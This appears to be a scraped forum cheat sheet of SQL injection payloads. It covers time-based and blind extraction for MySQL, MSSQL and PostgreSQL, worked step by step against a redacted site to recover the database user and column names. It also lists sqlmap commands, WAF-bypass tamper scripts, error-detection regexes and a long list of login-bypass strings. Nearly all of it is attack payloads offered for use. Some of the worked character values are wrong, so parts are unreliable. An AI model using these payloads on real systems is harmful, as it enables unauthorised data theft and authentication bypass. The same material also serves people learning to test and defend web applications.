MySql Time Based:RESULTING QUERY (WITH MALICIOUS SLEEP INJECTED).SELECT * FROM products WHERE id=1-SLEEP(5)RESULTING QUERY (WITH MALICIOUS BENCHMARK INJECTED).SELECT * FROM products WHERE id=1-BENCHMARK(100000000, rand())RESULTING QUERY - TIME-BASED ATTACK TO VERIFY DATABASE VERSION.SELECT * FROM products WHERE id=1-IF(MID(VERSION(),1,1) = '5', SLEEP(5), 0)Time Based Sqli:1 and (select sleep(5) from users where SUBSTR(table_name,1,1) = 'A')#Error Blind SQLi:AND (SELECT IF(1,(SELECT table_name FROM information_schema.tables),'a'))-- -Ultimate Sql injection Payload:SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/"Exploitation:redact.com/page/search?q=1 and sleep(5)--Current user:redact.com/page/search?q=1 and if(substring(user(),1,1)='a',SLEEP(5),1)--redact.com/page/search?q=1 and if(substring(user(),2,1)='a',SLEEP(5),1)--redact.com/page/search?q=1 and if(substring(user(),3,1)='a',SLEEP(5),1)--Table_name guessing:redact.com/page/search?q=1 and IF(SUBSTRING((select 1 from [guess_your_table_name] limit 0,1),1,1)=1,SLEEP(5),1)redact.com/page/search?q=1 and IF(SUBSTRING((select substring(concat(1,[guess_your_column_name]),1,1) from [existing_table_name] limit 0,1),1,1)=1,SLEEP(5),1)redact.com/page/search?q=1 and if((select mid(column_name,1,1) from table_name limit 0,1)='a',sleep(5),1)--Mssql Time Based:RESULTING QUERY (WITH MALICIOUS SLEEP INJECTED).SELECT * FROM products WHERE id=1; WAIT FOR DELAY '00:00:5'RESULTING QUERY (VERIFY IF USER IS SA).SELECT * FROM products WHERE id=1; IF SYSTEM_USER='sa' WAIT FOR DELAY '00:00:5'Exploitation:You must be logged in to see this link. WAITFOR DELAY '00:00:5'-- (+5 seconds)TIME-BASED Extraction of CURRENT DATABASE USERDetermine Length of USER:You must be logged in to see this link. IF (LEN(USER)=1) WAITFOR DELAY '00:00:5'--http://redact.com/page.aspx?id=1; IF (LEN(USER)=2) WAITFOR DELAY '00:00:5'--http://redact.com/page.aspx?id=1; IF (LEN(USER)=3) WAITFOR DELAY '00:00:5'--http://redact.com/page.aspx?id=1; IF (LEN(USER)=4) WAITFOR DELAY '00:00:5'--http://redact.com/page.aspx?id=1; IF (LEN(USER)=5) WAITFOR DELAY '00:00:5'-- (+5 seconds)Result = 5 characters in lengthDetermine length, and then try to find out CHAR value one character position at a time, like this:You must be logged in to see this link. IF (ASCII(lower(substring((USER),1,1)))>96) WAITFOR DELAY '00:00:5'-- (+5 seconds)You must be logged in to see this link. IF (ASCII(lower(substring((USER),1,1)))>50) WAITFOR DELAY '00:00:5'--http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1)))>98) WAITFOR DELAY '00:00:5'--http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1))=97) WAITFOR DELAY '00:00:5'-- (+5 seconds)Result = the first character CHAR value is 97 which is an "a"You must be logged in to see this link. IF (ASCII(lower(substring((USER),2,1)))>99) WAITFOR DELAY '00:00:5'-- (+5 seconds)You must be logged in to see this link. IF (ASCII(lower(substring((USER),2,1)))=50) WAITFOR DELAY '00:00:5'-- (+5 seconds)Result = the second character CHAR value is 50 which is a "d"You must be logged in to see this link. IF (ASCII(lower(substring((USER),3,1)))>58) WAITFOR DELAY '00:00:5'-- (+5 seconds)You must be logged in to see this link. IF (ASCII(lower(substring((USER),3,1)))=59) WAITFOR DELAY '00:00:5'—Result = third character CHAR value is 59 which is the letter "m"You must be logged in to see this link. IF (ASCII(lower(substring((USER),4,1)))>54) WAITFOR DELAY '00:00:5'-- (+5 seconds)You must be logged in to see this link. IF (ASCII(lower(substring((USER),4,1)))=55) WAITFOR DELAY '00:00:5'-- (+5 seconds)Result = the fourth character CHAR value is 55 which is an "i"You must be logged in to see this link. IF (ASCII(lower(substring((USER),5,1)))>59) WAITFOR DELAY '00:00:5'-- (+5 seconds)You must be logged in to see this link. IF (ASCII(lower(substring((USER),5,1)))=15) WAITFOR DELAY '00:00:5'-- (+5 seconds)the fifth character position has CHAR value of 15 which is the letter "n"Database User = 97,50,59,55,15 = adminTIME-BASED Extraction of 1st TABLE COLUMNS:let’s enumerate some columns from the table(s) we found:You must be logged in to see this link. IF (LEN(SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members')=4) WAITFOR DELAY '00:00:5'-- (+5 seconds)You can check the length before you start testing awayhttp://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),1,1)))=117) WAITFOR DELAY '00:00:5'-- (+5 seconds)You must be logged in to see this link. IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),1,1)))=115) WAITFOR DELAY '00:00:5'-- (+5 seconds)You must be logged in to see this link. IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),1,1)))=51) WAITFOR DELAY '00:00:5'-- (+5 seconds)You must be logged in to see this link. IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),1,1)))=114) WAITFOR DELAY '00:00:5'-- (+5 seconds)Column Name = 117,115,51,114 = userPostgresql Blind SQLI(Stacked Queries):id=1; select pg_sleep(5);-- -1; SELECT case when (SELECT current_setting('is_superuser'))='on' then pg_sleep(5) end;-- -
8.Blind Sql injection exploitation via sqlmap:
sqlmap -r req.txt -v 3 --time-sec=5 --technique=T --current-dbsqlmap -r req.txt -v 3 -p "input parameter" --level=5 --risk=3 --time-sec=5 --technique=T --current-dbsqlmap -r req.txt -v 3 -p "input parameter" --level=5 --risk=3 --time-sec=5 --technique=BT --current-db
9.Blind Sql injection WAF bypass (tamper):
Example:sqlmap -r req.txt -v 3 -p "input parameter" --level=5 --risk=3 --time-sec=5 --technique=T --tamper=between --current-dbMysql,Mssql,Postgresql,Oracle (Blind):betweenMysql (Blind):ifnull2casewhenisnullifnull2ifisnullMysql,Mssql,Postgresql,Oracle (Blind):charencodeMysql,Mssql,Postgresql (Blind):charunicodeencodeMysql (Blind):commalesslimitcommalessmidMysql (Blind):escapequotesUTF-8 (Blind):apostrophemaskoverlongutf8overlongutf8moreBypass waf in JSON (Blind):charunicodeescapeMysql,Postgresql,Oracle (Blind):greatestCloudfare waf (Blind):xforwardedfor
And
Quick SQLMap Tamper Suggester:You must be logged in to see this link.
10.Sql detection payload (Generic Error):
'"'"./\%5c%27%22%23%3B)")')))"))'))#;''```,""//\\%%00||0.or-1%23'or-1%23#Detection source:["SQL syntax.*MySQL", "Warning.*mysql_.*", "valid MySQL result", "MySqlClient\."]["PostgreSQL.*ERROR", "Warning.*\Wpg_.*", "valid PostgreSQL result", "Npgsql\."]["Driver.* SQL[\-\_\ ]*Server", "OLE DB.* SQL Server", "(\W|\A)SQL Server.*Driver", "Warning.*mssql_.*", "(\W|\A)SQL Server.*[0-9a-fA-F]{8}", "(?s)Exception.*\WSystem\.Data\.SqlClient\.", "(?s)Exception.*\WRoadhouse\.Cms\."]["Microsoft Access Driver", "JET Database Engine", "Access Database Engine"]["\bORA-[0-9][0-9][0-9][0-9]", "Oracle error", "Oracle.*Driver", "Warning.*\Woci_.*", "Warning.*\Wora_.*"]["CLI Driver.*DB2", "DB2 SQL error", "\bdb2_\w+\("]["SQLite/JDBCDriver", "SQLite.Exception", "System.Data.SQLite.SQLiteException", "Warning.*sqlite_.*", "Warning.*SQLite3::", "\[SQLITE_ERROR\]"]["(?i)Warning.*sybase.*", "Sybase message", "Sybase.*Server message.*"]
11.SQL Injection Auth Bypass:
'=' 'or'' or ''='/1#\'-'' ''&''^''*'' or ''-'' or '' '' or ''&'' or ''^'' or ''*'"-"" ""&""^""*"" or ""-"" or "" "" or ""&"" or ""^"" or ""*"or true--" or true--' or true--") or true--') or true--admin' --admin' #admin'/*admin' or '1'='1admin' or '1'='1'--admin' or '1'='1'#admin'or 1=1 or ''='admin' or 1=1admin' or 1=1--admin' or 1=1#admin' or 1=1/*admin") or ("1"="1admin") or ("1"="1"--admin") or ("1"="1"#admin") or ("1"="1"/*admin") or "1"="1admin") or "1"="1"--admin") or "1"="1"#admin") or "1"="1"/*' or 'x'='x') or ('x')=('x')) or (('x'))=(('x" or "x"="x") or ("x")=("x")) or (("x"))=(("x1'or'1'='1or 1=1or 1=1--or 1=1#or 1=1/*admin' or '1'='1'/*admin') or ('1'='1admin') or ('1'='1'--admin') or ('1'='1'#admin') or ('1'='1'/*admin') or '1'='1admin') or '1'='1'--admin') or '1'='1'#admin') or '1'='1'/*admin" --admin" #admin"/*admin" or "1"="1admin" or "1"="1"--admin" or "1"="1"#admin" or "1"="1"/*admin"or 1=1 or ""="admin" or 1=1admin" or 1=1--admin" or 1=1#admin" or 1=1/*
